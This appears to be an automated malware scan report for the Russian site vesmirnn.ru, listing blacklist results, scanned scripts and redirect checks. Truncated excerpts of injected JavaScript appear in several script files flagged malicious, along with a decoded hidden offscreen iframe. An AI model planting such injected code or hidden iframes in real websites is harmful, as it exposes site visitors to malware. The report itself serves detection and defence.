Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vesmirnn.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vesmirnn.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.vesmirnn.ru/ | 200 OK Content-Length: 26595 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 645x320 style: hidden src: http://ui.sletat.ru/hotresult.html?sfx=_gtnny&fbg=ffffff&mbg=ffffff&bbg=ffffff&bbd=eeeeee&cbd=abadb3&c1=222222&c2=838383&c3=9d1414&c4=dac6a1&style=.full.country%20span%23main%7bfont-weight%3a%20normal%20!important%3b%7d.full.country%20span%23main%7bfont-style%3a%20italic%20!important%3b%7d¤cy=rub&rc=5&stpl=%d0%93%d0%be%d1%80%d1%8f%d1%89%d0%b8%d0%b5%20%d1%82%d1%83%d1%80%d1%8b%20(%d0%9d%d0%b8%d0%b6%d0%bd%d0%b8%d0%b9%20%d0%9d%d0%be%d0%b2%d0%b3%d0%be%d1%80%d0%be%d0%b4)&settings={ <iframe allowtransparency="true" onload="sm2_sly_gtnny.init()" id="sm2_slyresult_gtnny" src="http://ui.sletat.ru/hotresult.html?sfx=_gtnny&fbg=ffffff&mbg=ffffff&bbg=ffffff&bbd=eeeeee&cbd=abadb3&c1=222222&c2=838383&c3=9d1414&c4=dac6a1&style=.full.country%20span%23main%7bfont-weight%3a%20normal%20!important%3b%7d.full.country%20span%23main%7bfont-style%3a%20italic%20!important%3b%7d¤cy=rub&rc=5&stpl=%d0%93%d0%be%d1%80%d1%8f%d1%89%d0%b8%d0%b5%20%d1%82%d1%83%d1%80%d1%8b%20(%d0%9d%d0%b8%d0%b6%d0%bd%d0%b8%d0%b9%20%d0%9d%d0%be%d0%b2%d0%b3%d0%be%d1%80%d0%be%d0%b4)&settings={'plugins':[]}" height="320" width="645" frameborder="0" style="display:none" scrolling="no"> | ||
http://www.vesmirnn.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 97755 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['fehinwgiejneG4tuhgnijnjkngeui4neg34uignjkwenbe4iugbkjegw3bugibenjkwg']; var lumpaZO = false; for (var i in nonList) { return this;},remote:function(){return Swiff.remote.apply(Swiff,[this.toElement()].append(arguments));}});Swiff.CallBacks={};Swiff.remote=function(obj,fn){var rs=obj.CallFunction('<invoke name="'+fn+'" returntype="javascript">'+__flash__argumentsToXML(arguments,2)+"</invoke>"); return eval(rs);};})(); Antivirus reports:
| ||
http://www.vesmirnn.ru/media/system/js/core.js | 200 OK Content-Length: 6177 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['fehinwgiejneG4tuhgnijnjkngeui4neg34uignjkwenbe4iugbkjegw3bugibenjkwg']; var lumpaZO = false; for (var i in nonList) { function tableOrdering(a,b,c){var d=document.adminForm;d.filter_order.value=a;d.filter_order_Dir.value=b;submitform(c)}function saveorder(a,b){checkAll_button(a,b)}function checkAll_button(a,b){b||(b="saveorder");for(var c=0;c<=a;c++){var d=document.adminForm["cb"+c];if(d){if(!1==d.checked)d.checked=!0}else{alert("You cannot change the order of items, as an item in the list is `Checked Out`");return}}submitform(b)}; Antivirus reports:
| ||
http://www.vesmirnn.ru/media/system/js/caption.js | 200 OK Content-Length: 2123 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['fehinwgiejneG4tuhgnijnjkngeui4neg34uignjkwenbe4iugbkjegw3bugibenjkwg']; var lump ...[1750 bytes skipped]... Decoded script: <iframe src=http://google.com style="position:absolute;left:-1300px;top:-1300px;" height="111" width="111"></iframe> | ||
http://www.vesmirnn.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 239724 Content-Type: application/javascript | clean |
http://www.vesmirnn.ru/templates/hot_sailing/js/jquery/jquery.min.js | 200 OK Content-Length: 93868 Content-Type: application/javascript | clean |
http://www.vesmirnn.ru/templates/hot_sailing/js/jquery/jquery-ui.min.js | 200 OK Content-Length: 210902 Content-Type: application/javascript | clean |
http://www.vesmirnn.ru/templates/hot_sailing/js/jquery.hjt.nav.js | 200 OK Content-Length: 2358 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function bobnilagun(){ var nonList = ['fehinwgiejneG4tuhgnijnjkngeui4neg34uignjkwenbe4iugbkjegw3bugibenjkwg']; var lumpaZO = false; for (var i in nonList) { jQuery('ul.mnu_topmenu > li').hover(function(){ jQuery(this).has('ul').addClass('topradiusonly'); }); jQuery('.menu.nav li').hover(function(){ jQuery(this).find('ul:first').stop(true,true)[options.effect](options.speed); },function(){ jQuery(this).css('position', 'relative') .find('ul:first').stop(true,true)[options.effect](options.speed); }); }); }; })(jQuery); Antivirus reports:
| ||
http://ui.sletat.ru/client/linker_hot.js?settings={formViewMode:'block'}&sfx=_GtNnY | 200 OK Content-Length: 24635 Content-Type: text/javascript | clean |
http://www.vesmirnn.ru//yandex.st/share/share.js/ | HTTP/1.1 404 Not Found Connection: close Date: Sun, 21 Sep 2014 07:34:37 GMT Server: nginx/1.6.0 Content-Length: 155 Content-Type: text/html; charset=iso-8859-1 | clean |
http://handler.hostland.ru/404.html?errorurl= | 200 OK Content-Length: 10803 Content-Type: text/html | clean |
http://handler.hostland.ru/test404page.js | 200 OK Content-Length: 504 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vesmirnn.ru
Result:
GET / HTTP/1.1
Host: vesmirnn.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: vesmirnn.ru
Referer: http://www.google.com/search?q=vesmirnn.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vesmirnn.ru
Referer: http://www.google.com/search?q=vesmirnn.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.